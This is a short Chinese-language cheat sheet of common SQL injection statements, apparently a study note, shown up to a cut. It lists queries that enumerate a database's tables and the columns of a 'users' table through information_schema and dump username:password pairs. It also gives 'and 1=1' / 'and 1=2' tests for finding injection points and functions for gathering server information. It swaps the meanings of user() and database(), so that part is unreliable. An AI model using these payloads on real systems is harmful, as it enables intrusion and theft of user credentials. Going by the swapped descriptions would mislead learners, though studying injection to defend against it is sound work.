sql常用的注入语句 查询数据库----假设为 security select database(); 查询数据库中的表 select group_concat(table_name) from information_schema.tables where table_schema=database(); 查询表中的字段名(security.users表中的列) select group_concat(column_name) from information_schema.columns where table_name='users'; 查询字段的值(0x3a是:) select group_concat(username,0x3a,password) from users; 学习SQL注入简单类型: 如何判断注入点: and 1=1 页面正常 and 1=2 页面错误 可能存在注入点 选用经验最足的方法去测试: 或 且 非 三种逻辑判断符 判断输入的字符是否对页面造成影响,带入数据库进行了查询。 信息收集: 数据库版本:version() 数据库名字:user() 数据库用户:database() 操作系统:@@version_comp